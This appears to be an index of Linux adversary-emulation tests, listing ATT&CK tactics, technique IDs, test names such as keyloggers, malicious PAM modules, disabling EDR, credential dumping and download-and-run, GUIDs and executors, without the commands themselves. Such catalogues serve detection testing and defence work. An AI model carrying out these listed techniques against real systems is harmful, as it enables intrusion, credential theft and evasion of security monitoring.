defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,6,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,7,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,4,Stop Crowdstrike Falcon on Linux,828a1278-81cc-4802-96ab-188bf29ca77d,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,38,Clear History,23b88394-091b-4968-a42d-fb8076992443,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,39,Suspend History,94f6a1c9-aae7-46a4-9083-2bb1f5768ec4,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,40,Reboot Linux Host via Kernel System Request,6d6d3154-1a52-4d1a-9d51-92ab8148b32e,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,41,Clear Pagging Cache,f790927b-ea85-4a16-b7b2-7eb44176a510,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,42,Disable Memory Swap,e74e4c63-6fde-4ad2-9ee8-21c3a1733114,sh
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
defense-evasion,T1036.003,Masquerading: Rename System Utilities,2,Masquerading as Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,2,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,3,C compile,d0377aa6-850a-42b2-95f0-de558d80be57,bash
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,4,CC compile,da97bb11-d6d0-4fc1-b445-e443d1346efe,bash
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,5,Go compile,78bd3fa7-773c-449e-a978-dc1f1500bc52,bash
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,2,"Binary packed by UPX, with modified headers (linux)",f06197f8-ff46-48c2-a0c6-afc1b50665e1,sh
defense-evasion,T1036.006,Masquerading: Space after Filename,2,Space After Filename,b95ce2eb-a093-4cd8-938d-5258cef656ea,bash
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
defense-evasion,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,10,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
persistence,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
persistence,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
persistence,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
persistence,T1546.005,Event Triggered Execution: Trap,2,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
persistence,T1136.001,Create Account: Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash
persistence,T1136.001,Create Account: Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,3,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,4,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,5,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,6,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
persistence,T1543.002,Create or Modify System Process: Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
persistence,T1543.002,Create or Modify System Process: Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
persistence,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
persistence,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
persistence,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
persistence,T1078.003,Valid Accounts: Local Accounts,10,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,bash
command-and-control,T1105,Ingress Tool Transfer,2,rsync remote file copy (pull),3180f7d5-52c0-4493-9ea0-e3431a84773f,bash
command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83a49600-222b-4866-80a0-37736ad29344,bash
command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,bash
command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash
command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,bash
command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
command-and-control,T1105,Ingress Tool Transfer,27,Linux Download File and Run,bdc373c5-e9cf-4563-8a7b-a9ba720a90f3,sh
command-and-control,T1090.001,Proxy: Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,9,Encrypts collected data with AES-256 and Base64,a743e3a6-e8b2-4a30-abe7-ca85d201b5d3,bash
collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
collection,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
collection,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
collection,T1056.001,Input Capture: Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
collection,T1056.001,Input Capture: Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
collection,T1056.001,Input Capture: Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
collection,T1115,Clipboard Data,5,Add or copy content to clipboard with xClip,ee363e53-b083-4230-aff3-f8d955f2d5bb,sh
collection,T1560.002,Archive Collected Data: Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
collection,T1560.002,Archive Collected Data: Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
collection,T1560.002,Archive Collected Data: Archive via Library,3,Compressing data using zipfile in Python (Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,bash
collection,T1560.002,Archive Collected Data: Archive via Library,4,Compressing data using tarfile in Python (Linux),e86f1b4b-fcc1-4a2a-ae10-b49da01458db,bash
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
privilege-escalation,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
privilege-escalation,T1546.005,Event Triggered Execution: Trap,2,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,6,Do reconnaissance for files that have the setuid bit set,8e36da01-cd29-45fd-be72-8a0fcaad4481,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,7,Do reconnaissance for files that have the setgid bit set,3fb46e17-f337-4c14-9f9a-a471946533e2,sh
privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,3,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,4,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,5,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,6,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
203 privilege-escalation T1543.002 Create or Modify System Process: Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
204 privilege-escalation T1543.002 Create or Modify System Process: Systemd Service 2 Create Systemd Service file, Enable the service , Modify and Reload the service. c35ac4a8-19de-43af-b9f8-755da7e89c89 bash
205 privilege-escalation T1053.002 Scheduled Task/Job: At 2 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
206 privilege-escalation T1078.003 Valid Accounts: Local Accounts 8 Create local account (Linux) 02a91c34-8a5b-4bed-87af-501103eb5357 bash
207 privilege-escalation T1078.003 Valid Accounts: Local Accounts 9 Reactivate a locked/expired account (Linux) d2b95631-62d7-45a3-aaef-0972cea97931 bash
208 privilege-escalation T1078.003 Valid Accounts: Local Accounts 10 Login as nobody (Linux) 3d2cd093-ee05-41bd-a802-59ee5c301b85 bash
209 credential-access T1556.003 Modify Authentication Process: Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
210 credential-access T1556.003 Modify Authentication Process: Pluggable Authentication Modules 2 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
211 credential-access T1056.001 Input Capture: Keylogging 2 Living off the land Terminal Input Capture on Linux with pam.d 9c6bdb34-a89f-4b90-acb1-5970614c711b sh
212 credential-access T1056.001 Input Capture: Keylogging 3 Logging bash history to syslog 0e59d59d-3265-4d35-bebd-bf5c1ec40db5 sh
213 credential-access T1056.001 Input Capture: Keylogging 4 Bash session based keylogger 7f85a946-a0ea-48aa-b6ac-8ff539278258 sh
214 credential-access T1056.001 Input Capture: Keylogging 5 SSHD PAM keylogger 81d7d2ad-d644-4b6a-bea7-28ffe43becca sh
215 credential-access T1056.001 Input Capture: Keylogging 6 Auditd keylogger a668edb9-334e-48eb-8c2e-5413a40867af sh
216 credential-access T1110.001 Brute Force: Password Guessing 5 SUDO Brute Force - Debian ba1bf0b6-f32b-4db0-b7cc-d78cacc76700 bash
217 credential-access T1110.001 Brute Force: Password Guessing 6 SUDO Brute Force - Redhat 4097bc00-5eeb-4d56-aaf9-287d60351d95 bash
218 credential-access T1003.007 OS Credential Dumping: Proc Filesystem 1 Dump individual process memory with sh (Local) 7e91138a-8e74-456d-a007-973d67a0bb80 sh
219 credential-access T1003.007 OS Credential Dumping: Proc Filesystem 2 Dump individual process memory with Python (Local) 437b2003-a20d-4ed8-834c-4964f24eec63 sh
220 credential-access T1003.007 OS Credential Dumping: Proc Filesystem 3 Capture Passwords with MimiPenguin a27418de-bdce-4ebd-b655-38f04842bf0c bash
221 credential-access T1040 Network Sniffing 1 Packet Capture Linux using tshark or tcpdump 7fe741f7-b265-4951-a7c7-320889083b3e bash
222 credential-access T1040 Network Sniffing 9 Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo 10c710c9-9104-4d5f-8829-5b65391e2a29 bash
223 credential-access T1040 Network Sniffing 10 Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo 7a0895f0-84c1-4adf-8491-a21510b1d4c1 bash
224 credential-access T1040 Network Sniffing 11 Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo 515575ab-d213-42b1-aa64-ef6a2dd4641b bash
225 credential-access T1040 Network Sniffing 12 Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo b1cbdf8b-6078-48f5-a890-11ea19d7f8e9 bash
226 credential-access T1552 Unsecured Credentials 1 AWS - Retrieve EC2 Password Data using stratus a21118de-b11e-4ebd-b655-42f11142df0c sh
227 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 9 LaZagne.py - Dump Credentials from Firefox Browser 87e88698-621b-4c45-8a89-4eaebdeaabb1 sh
228 credential-access T1552.004 Unsecured Credentials: Private Keys 2 Discover Private SSH Keys 46959285-906d-40fa-9437-5a439accd878 sh
229 credential-access T1552.004 Unsecured Credentials: Private Keys 3 Copy Private SSH Keys with CP 7c247dc7-5128-4643-907b-73a76d9135c3 sh
230 credential-access T1552.004 Unsecured Credentials: Private Keys 4 Copy Private SSH Keys with rsync 864bb0b2-6bb5-489a-b43b-a77b3a16d68a sh
231 credential-access T1552.004 Unsecured Credentials: Private Keys 5 Copy the users GnuPG directory with rsync 2a5a0601-f5fb-4e2e-aa09-73282ae6afca sh
232 credential-access T1552.003 Unsecured Credentials: Bash History 1 Search Through Bash History 3cfde62b-7c33-4b26-a61e-755d6131c8ce sh
233 credential-access T1552.001 Unsecured Credentials: Credentials In Files 1 Find AWS credentials 2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17 sh
234 credential-access T1552.001 Unsecured Credentials: Credentials In Files 3 Extract passwords with grep bd4cf0d1-7646-474e-8610-78ccf5a097c4 sh
235 credential-access T1552.001 Unsecured Credentials: Credentials In Files 6 Find and Access Github Credentials da4f751a-020b-40d7-b9ff-d433b7799803 bash
236 credential-access T1110.004 Brute Force: Credential Stuffing 1 SSH Credential Stuffing From Linux 4f08197a-2a8a-472d-9589-cd2895ef22ad bash
237 credential-access T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow 1 Access /etc/shadow (Local) 3723ab77-c546-403c-8fb4-bb577033b235 bash
238 credential-access T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow 2 Access /etc/passwd (Local) 60e860b6-8ae6-49db-ad07-5e73edd88f5d sh
239 credential-access T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow 3 Access /etc/{shadow,passwd} with a standard bin that's not cat df1a55ae-019d-4120-bc35-94f4bc5c4b0a bash
240 credential-access T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow 4 Access /etc/{shadow,passwd} with shell builtins f5aa6543-6cb2-4fae-b9c2-b96e14721713 bash
241 discovery T1033 System Owner/User Discovery 2 System Owner/User Discovery 2a9b677d-a230-44f4-ad86-782df1ef108c sh
242 discovery T1087.001 Account Discovery: Local Account 1 Enumerate all accounts (Local) f8aab3dd-5990-4bf8-b8ab-2226c951696f sh
243 discovery T1087.001 Account Discovery: Local Account 2 View sudoers access fed9be70-0186-4bde-9f8a-20945f9370c2 sh
244 discovery T1087.001 Account Discovery: Local Account 3 View accounts with UID 0 c955a599-3653-4fe5-b631-f11c00eb0397 sh
245 discovery T1087.001 Account Discovery: Local Account 4 List opened files by user 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb sh
246 discovery T1087.001 Account Discovery: Local Account 5 Show if a user account has ever logged in remotely 0f0b6a29-08c3-44ad-a30b-47fd996b2110 sh
247 discovery T1087.001 Account Discovery: Local Account 6 Enumerate users and groups e6f36545-dc1e-47f0-9f48-7f730f54a02e sh
248 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 1 Detect Virtualization Environment (Linux) dfbd1a21-540d-4574-9731-e852bd6fe840 sh
249 discovery T1007 System Service Discovery 3 System Service Discovery - systemctl f4b26bce-4c2c-46c0-bcc5-fce062d38bef bash
250 discovery T1040 Network Sniffing 1 Packet Capture Linux using tshark or tcpdump 7fe741f7-b265-4951-a7c7-320889083b3e bash
251 discovery T1040 Network Sniffing 9 Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo 10c710c9-9104-4d5f-8829-5b65391e2a29 bash
252 discovery T1040 Network Sniffing 10 Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo 7a0895f0-84c1-4adf-8491-a21510b1d4c1 bash
253 discovery T1040 Network Sniffing 11 Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo 515575ab-d213-42b1-aa64-ef6a2dd4641b bash
254 discovery T1040 Network Sniffing 12 Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo b1cbdf8b-6078-48f5-a890-11ea19d7f8e9 bash
255 discovery T1135 Network Share Discovery 2 Network Share Discovery - linux 875805bc-9e86-4e87-be86-3a5527315cae bash
256 discovery T1082 System Information Discovery 3 List OS Information cccb070c-df86-4216-a5bc-9fb60c74e27c sh
257 discovery T1082 System Information Discovery 4 Linux VM Check via Hardware 31dad7ad-2286-4c02-ae92-274418c85fec bash
258 discovery T1082 System Information Discovery 5 Linux VM Check via Kernel Modules 8057d484-0fae-49a4-8302-4812c4f1e64e bash
259 discovery T1082 System Information Discovery 7 Hostname Discovery 486e88ea-4f56-470f-9b57-3f4d73f39133 bash
260 discovery T1082 System Information Discovery 11 Environment variables discovery on macos and linux fcbdd43f-f4ad-42d5-98f3-0218097e2720 sh
261 discovery T1082 System Information Discovery 24 Linux List Kernel Modules 034fe21c-3186-49dd-8d5d-128b35f181c7 sh
262 discovery T1217 Browser Bookmark Discovery 1 List Mozilla Firefox Bookmark Database Files on Linux 3a41f169-a5ab-407f-9269-abafdb5da6c2 sh
263 discovery T1016 System Network Configuration Discovery 3 System Network Configuration Discovery c141bbdb-7fca-4254-9fd6-f47e79447e17 sh
264 discovery T1083 File and Directory Discovery 3 Nix File and Directory Discovery ffc8b249-372a-4b74-adcd-e4c0430842de sh
265 discovery T1083 File and Directory Discovery 4 Nix File and Directory Discovery 2 13c5e1ae-605b-46c4-a79f-db28c77ff24e sh
266 discovery T1049 System Network Connections Discovery 3 System Network Connections Discovery Linux & MacOS 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 sh
267 discovery T1057 Process Discovery 1 Process Discovery - ps 4ff64f0b-aaf2-4866-b39d-38d9791407cc sh
268 discovery T1069.001 Permission Groups Discovery: Local Groups 1 Permission Groups Discovery (Local) 952931a4-af0b-4335-bbbe-73c8c5b327ae sh
269 discovery T1201 Password Policy Discovery 1 Examine password complexity policy - Ubuntu 085fe567-ac84-47c7-ac4c-2688ce28265b bash
270 discovery T1201 Password Policy Discovery 2 Examine password complexity policy - CentOS/RHEL 7.x 78a12e65-efff-4617-bc01-88f17d71315d bash
271 discovery T1201 Password Policy Discovery 3 Examine password complexity policy - CentOS/RHEL 6.x 6ce12552-0adb-4f56-89ff-95ce268f6358 bash
272 discovery T1201 Password Policy Discovery 4 Examine password expiration policy - All Linux 7c86c55c-70fa-4a05-83c9-3aa19b145d1a bash
273 discovery T1614.001 System Location Discovery: System Language Discovery 3 Discover System Language with locale 837d609b-845e-4519-90ce-edc3b4b0e138 sh
274 discovery T1614.001 System Location Discovery: System Language Discovery 4 Discover System Language with localectl 07ce871a-b3c3-44a3-97fa-a20118fdc7c9 sh
275 discovery T1614.001 System Location Discovery: System Language Discovery 5 Discover System Language by locale file 5d7057c9-2c8a-4026-91dd-13b5584daa69 sh
276 discovery T1614.001 System Location Discovery: System Language Discovery 6 Discover System Language by Environment Variable Query cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a sh
277 discovery T1518.001 Software Discovery: Security Software Discovery 4 Security Software Discovery - ps (Linux) 23b91cd2-c99c-4002-9e41-317c63e024a2 sh
278 discovery T1018 Remote System Discovery 6 Remote System Discovery - arp nix acb6b1ff-e2ad-4d64-806c-6c35fe73b951 sh
279 discovery T1018 Remote System Discovery 7 Remote System Discovery - sweep 96db2632-8417-4dbb-b8bb-a8b92ba391de sh
280 discovery T1018 Remote System Discovery 12 Remote System Discovery - ip neighbour 158bd4dd-6359-40ab-b13c-285b9ef6fa25 sh
281 discovery T1018 Remote System Discovery 13 Remote System Discovery - ip route 1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1 sh
282 discovery T1018 Remote System Discovery 14 Remote System Discovery - ip tcp_metrics 6c2da894-0b57-43cb-87af-46ea3b501388 sh
283 discovery T1046 Network Service Discovery 1 Port Scan 68e907da-2539-48f6-9fc9-257a78c05540 bash
284 discovery T1046 Network Service Discovery 2 Port Scan Nmap 515942b0-a09f-4163-a7bb-22fefb6f185f sh
